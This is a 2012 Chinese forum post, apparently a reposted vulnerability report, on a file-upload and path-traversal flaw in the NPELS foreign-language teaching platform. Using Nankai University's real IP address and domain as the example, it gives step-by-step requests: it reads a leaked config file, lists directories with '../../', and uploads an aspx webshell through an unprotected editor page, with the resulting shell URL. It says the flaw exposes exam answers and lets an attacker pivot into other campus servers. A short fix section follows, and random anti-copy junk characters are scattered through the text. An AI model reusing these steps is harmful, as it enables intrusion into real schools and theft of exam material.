找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2213|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
  o& d1 Q) \; J; W  q+ `. a' ?! v# H
详细说明:$ K4 R% @5 N' q. _% m4 J

, P& v% _( j: g& l) K以南开大学的为例: 9 j, Z! J  x7 e$ r& z1 D5 T
http://222.30.60.3/NPELS9 D$ H" l7 j5 E8 U0 ^; D' ?0 d! n
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址2 O( J+ t* L+ C- ]+ s
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
. G* O% I. c: R. k  B4 y<value>http://222.30.60.3/NPELS/CommonService.asmx</value>$ Q; W; ^" u6 x
</setting>% y8 [+ q& B  q1 S0 g+ b! T
及版本号
2 S2 i# O) Q) ]- Q4 e<add key="TVersion" value="1, 0, 0, 2187">
, ~; X( J" a% M' `</add>
& k8 N" {1 \; y# B, [, J/ `! e. _直接访问
/ g- z$ E5 a( n: o8 `2 Jhttp://222.30.60.3/NPELS/CommonService.asmx& K+ ^, p$ p/ }! y
使用GetTestClientFileList操作,直接 HTTP GET 列目录:: f$ W  v$ B3 C' n' P/ j
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187" h  H# T; J- `! Q  H' m
进一步列目录(返回的网页很大,可以直接 wget 下来)
+ [4 d9 [, l' d9 G. v  y5 Hhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
$ g' _; P9 N; v% R 9 E: e% @: l1 ^' I1 K" G
发现5 R$ e8 @+ {9 L% O! A  s+ M
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
  A3 T1 o; C" h: M+ T- J可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头; G& f9 |$ D5 e. |+ i6 |0 t0 F% C9 g
上传后继续列目录找到木马地址直接访问即可
0 K" z7 r( k5 q& ]
) p. t3 O: G6 X/ }' IOOXX2 q/ v2 B: H0 d& \* Y! b
& M! l8 W2 F4 d- a- S! ?4 w# y
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法+ O9 _7 h8 e+ a0 `- t9 B; g# h
漏洞证明:
/ R. |, z* s7 D& a* c4 w  ]
' N/ F# ^: t; {3 I$ ]8 _8 U; [9 I列目录:
( B$ [6 [0 g& C2 h9 P2 N0 ~http://222.30.60.3/NPELS/CommonS ... List?version=../../
7 ^* ~' `/ M* f. W0 M9 J0 C. h文件上传:
8 D9 v0 ^! O7 p: nhttp://222.30.60.3/npelsv/editor/editor.htm
: v% D( C; q) h1 l2 Y  V
: O4 N7 Z8 d4 K* ^% r上传木马:
* T0 H" ?9 {; {5 _+ ~http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
; J, j7 j9 ~4 c2 X+ c. P 0 W7 L& K) S) J1 k4 |9 O0 u
修复方案:
) [. ]9 @# C2 n) x% v9 n2 O好像考试系统必须使用 CommonService.asmx% c- X. U1 t5 i, z9 Y. M# \  @6 ]
最好配置文件加密或者用别的方式不让它泄露出来8 y0 n/ \  h) R; N( H  \/ N+ R# `3 v2 H
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​' ], c: f. t& B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表